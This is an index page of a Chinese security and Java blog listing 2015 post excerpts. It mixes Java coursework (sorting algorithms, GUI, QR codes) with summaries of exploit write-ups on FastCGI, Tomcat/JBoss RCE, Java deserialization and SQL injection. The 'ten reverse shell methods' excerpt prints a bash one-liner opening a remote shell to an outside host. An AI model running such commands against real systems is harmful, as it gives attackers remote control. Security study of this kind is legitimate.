会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
Sevck's Blog
关注互联网安全,软件开发,这里记录着我的渗透心得、开发文摘、随笔心情(Linux,Windows,Python,Java.Lua,JS,C++在学习)。JAVA安全网:https://www.javasec.cn
新随笔
订阅
管理
上一页
1
···
12
13
14
15
16
2015年11月21日
FPM的远程利用
摘要: 看了lijiejie的博客,和乌云的PHPFastCGI的这篇文章,感觉在实际的业务中经常能遇到,所以在此记录下来:原文:http://www.lijiejie.com/fastcgi-read-file-vulnerability-scan-py/http://zone.wooyun.org/co...
阅读全文
posted @ 2015-11-21 10:31 sevck
阅读(570)
评论(0)
推荐(0)
2015年11月19日
反弹shell的十种姿势
摘要: bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1,注意某些linux不支持perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname...
阅读全文
posted @ 2015-11-19 20:00 sevck
阅读(1211)
评论(0)
推荐(0)
[CVE:2013-4810]Apache Tomcat/JBoss远程命令执行
摘要: 1 = 0x20 && $i $line) { 29 echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . $newline; ...
阅读全文
posted @ 2015-11-19 19:59 sevck
阅读(3161)
评论(0)
推荐(0)
2015年11月15日
Java反序列化漏洞通用利用分析
摘要: 原文:http://blog.chaitin.com/2015-11-11_java_unserialize_rce/博主也是JAVA的,也研究安全,所以认为这个漏洞非常严重。长亭科技分析的非常细致。1 背景2015年11月6日,FoxGlove Security安全团队的@breenmachine...
阅读全文
posted @ 2015-11-15 20:03 sevck
阅读(13047)
评论(2)
推荐(0)
Java Web表达式注入
摘要: 原文:http://netsecurity.51cto.com/art/201407/444548.htm0×00 引言在2014年6月18日@终极修炼师曾发布这样一条微博:链接的内容是一个名为Jenkins的服务,可以在没有password的情况下受到攻击。而攻击方法比较有趣,Jenkins提供了...
阅读全文
posted @ 2015-11-15 19:59 sevck
阅读(1558)
评论(0)
推荐(0)
2015年11月7日
sql注入在线检测(sqlmapapi)
摘要: 版权:http://blog.csdn.net/yueguanghaidao/article/details/38026431每次看都不方便 摘抄下来之前一搞渗透的同事问我,sqlmapapi.py是干啥的,我猜很多人都玩过sqlmap,但玩过sqlmapapi的应该比较少,今天就和大家一起看看如...
阅读全文
posted @ 2015-11-07 17:46 sevck
阅读(7399)
评论(0)
推荐(0)
【转】Kali Linux 新手折腾笔记
摘要: 原作者:http://defcon.cn/1618.html最近在折腾Kali Linux 顺便做一简单整理,至于安装就不再多扯了,估计会出现的问题上一篇文章《VMware虚拟机安装Kali Linux 遇到的问题》也有提到,包括Kali Linux和VMware Workstation 10 下载...
阅读全文
posted @ 2015-11-07 16:39 sevck
阅读(945)
评论(0)
推荐(0)
2015年10月30日
JAVA开发-我的第一个webScan扫描器
摘要: 写的第一句话就是感谢shack2,参考了他的代码知道原来有的解耦可以这样写,但是又在他的基础上改写了很多。代码分享给大写,下面是程序的截图,我把他取名为:HadesWebScan ps:Windows开发,不是MAC的百度网盘:链接: http://pan.baidu.com/s/1c0HijxY...
阅读全文
posted @ 2015-10-30 09:43 sevck
阅读(793)
评论(0)
推荐(0)
2015年10月20日
JAVA开发--游戏24点
摘要: 也比较简单,写的不好,代码里用到了LOOKANDFELL,QUAQUA8.0的包package com.Game24;import java.awt.Container;import java.awt.Dimension;import java.awt.FlowLayout;import java....
阅读全文
posted @ 2015-10-20 18:05 sevck
阅读(478)
评论(0)
推荐(0)
JAVA开发--U盘EXE恢复工具
摘要: 原理比较简单,在学校机房U盘总被感染,写一个工具来方便用 1 package com.udiskrecover; 2 3 import java.awt.Container; 4 import java.awt.FlowLayout; 5 import java.awt.GridLayo...
阅读全文
posted @ 2015-10-20 18:01 sevck
阅读(521)
评论(0)
推荐(0)
2015年5月27日
分享一个比较有意思的题目
摘要: 这道题是老师前几天在课堂上的思考题,如下:定义一个字符串,例如:“exe.jpg.asp.php”,得到最后的扩展名。自己做出来三种方法,今天老师把每个班级写出来的给我们看了下,发现有几个写的不错,从代码来看对String的理解:CODE1: 1 package com.xlm; 2 3 impo...
阅读全文
posted @ 2015-05-27 19:31 sevck
阅读(453)
评论(0)
推荐(0)
2015年5月26日
JAVA GUI设计中遇到的一个小问题
摘要: 最近新学,大牛勿喷。。 写下笔记主要是记录自己常犯的错误,也方便新人解决问题学习参考。问题:win7下设计GUI,文本框和密码框显示不出来。我的解决方案:1.JTextField text = new JTextField(JTextField.RIGHT);JPasswordField pass ...
阅读全文
posted @ 2015-05-26 19:56 sevck
阅读(497)
评论(0)
推荐(0)
2015年5月12日
JAVA查找--[二分查找]
摘要: 1 package com.array; 2 3 public class BinaryFind { 4 /* 5 * 项目名称:二分查找 ; 6 * 项目要求:用JAVA对数组进行查找,并运用快速查找算法; 7 * 作者:Sevck; 8 */ ...
阅读全文
posted @ 2015-05-12 21:27 sevck
阅读(340)
评论(0)
推荐(0)
JAVA排序--[快速排序]
摘要: 1 package com.array; 2 3 public class Sort_Quick { 4 /* 5 * 项目名称:快速排序 ; 6 * 项目要求:用JAVA对数组进行排序,并运用快速排序算法; 7 * 作者:Sevck; 8 *...
阅读全文
posted @ 2015-05-12 21:26 sevck
阅读(344)
评论(0)
推荐(0)
JAVA排序--[插入排序]
摘要: 1 package com.array; 2 3 public class Sort_Insert { 4 /* 5 * 项目名称:插入排序 ; 6 * 项目要求:用JAVA对数组进行排序,并运用插入排序算法; 7 * 作者:Sevck; 8 ...
阅读全文
posted @ 2015-05-12 21:25 sevck
阅读(366)
评论(0)
推荐(0)
Java中静态和非静态的区别
摘要: 在网上看到的,感觉还不错,自己笔记下来,以后忘了方便看:非静态方法是相对于静态方法来说的。静态方法使用static关键字来标示,非静态方法没有此关键字。他们之间最大的区别在于它们生命周期的不同,静态方法属于全局方法,当静态方法第一次被访问的时候,就将常驻内存直到整个系统被销毁;而非静态方法则与类有关...
阅读全文
posted @ 2015-05-12 20:58 sevck
阅读(1199)
评论(0)
推荐(0)
JAVA开发--[二维码名片生成系统]
摘要: 上个月学校有个软件创新杯,最近看了网上很火的二维码比较不错。参考了国内国外一些技术文章,发现国外的确实好很多。用的是QRcode包来实现的,基本常见的功能全部实现了。因为刚学2个月,部分做得不是很好,记得第一次写的更烂,然后代码、功能、架构全部重写。可能做得不是很好,在最后的决赛还是没进去。不得不佩...
阅读全文
posted @ 2015-05-12 17:11 sevck
阅读(1731)
评论(10)
推荐(2)
JAVA排序--[选择排序]
摘要: 1 package com.array; 2 public class Sort_Select { 3 /** 4 * 项目名称:选择排序 ; 5 * 项目要求:用JAVA对数组进行排序,并运用选择排序算法; 6 * 作者:Sevck; 7 */ ...
阅读全文
posted @ 2015-05-12 16:37 sevck
阅读(386)
评论(0)
推荐(0)
JAVA排序--[冒泡排序]
摘要: 1 package com.array; 2 3 public class Sort_MaoPao { 4 /** 5 * 项目名称:冒泡排序 6 * 项目要求:用JAVA对数组进行排序,并运用冒泡排序算法 7 * 作者:Sevck 8 */ 9...
阅读全文
posted @ 2015-05-12 16:36 sevck
阅读(321)
评论(0)
推荐(0)
JavaScript基础知识总结
摘要: 正则表达式:是一种专门用于操作字符串规则。正则表达式:通过一些符号来表达,简化对字符串的复杂操作。弊端:阅读性较差常见操作:1.匹配 String matches(regex)2.获取(查找):1 Pattern , Matcher2 Pattern p = pattern.c...
阅读全文
posted @ 2015-05-12 16:23 sevck
阅读(565)
评论(0)
推荐(0)
上一页
1
···
12
13
14
15
16
公告